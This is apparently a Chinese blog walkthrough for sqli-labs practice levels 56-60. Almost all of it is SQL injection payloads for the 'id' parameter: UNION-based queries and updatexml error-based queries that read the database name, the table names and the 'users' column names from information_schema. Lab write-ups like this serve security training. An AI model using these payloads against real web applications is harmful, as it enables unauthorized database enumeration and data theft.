sql-labs56-60通关攻略

第56关

一查询数据库

?id=-1')union select 1,2,database()--+

二.查表

?id=-1')union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

三.查看users表中列名

?id=-1')union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

第57关

一.查看数据库

?id=-1"union select 1,2,database()--+

二.查看表名

?id=-1"union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

三.查看users表中列名

?id=-1"union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

第58关

一.查看数据库

?id=1' and updatexml(1,concat(1,(select database())),1)--+

二.查看表名

?id=1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+

三.查看users表中列名

?id=1' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)--+

第59关

一.查看数据库

?id=1 and updatexml(1,concat(1,(select database())),1)

二.查看表名

?id=1 and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)

三.查看users表中列名

?id=1 and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)

第60关

一.查看数据库

?id=1") and updatexml(1,concat(1,(select database())),1)--+

二.查看表名

?id=1") and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+

三.查看users表中列名

?id=1")and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)--+

相关推荐
生活很暖很治愈32 分钟前
C51数字时钟/日历---LCD1602液晶显示屏
数据库·单片机·mongodb
YONG823_API41 分钟前
1688商品数据采集API的测试对接步骤分享(提供免费测试key)
开发语言·数据库·爬虫·python·数据挖掘
码上一元1 小时前
掌握 Spring 事务管理:深入理解 @Transactional 注解
数据库·spring
程序猿毕设源码分享网1 小时前
基于springboot停车场管理系统源码和论文
数据库·spring boot·后端
YiSLWLL1 小时前
Django+Nginx+uwsgi网站使用Channels+redis+daphne实现简单的多人在线聊天及消息存储功能
服务器·数据库·redis·python·nginx·django
程序员学姐1 小时前
基于SpringBoot+Vue的高校社团管理系统
java·开发语言·vue.js·spring boot·后端·mysql·spring
.生产的驴1 小时前
Docker Seata分布式事务保护搭建 DB数据源版搭建 结合Nacos服务注册
数据库·分布式·后端·spring cloud·docker·容器·负载均衡
盖盖衍上1 小时前
4.4 MySQL 触发器(Trigger)
数据库·mysql
清心歌1 小时前
Redis入门(九)
数据库·redis
superman超哥1 小时前
Oralce数据库巡检SQL脚本
数据库·oracle·性能优化·dba·rdbms·巡检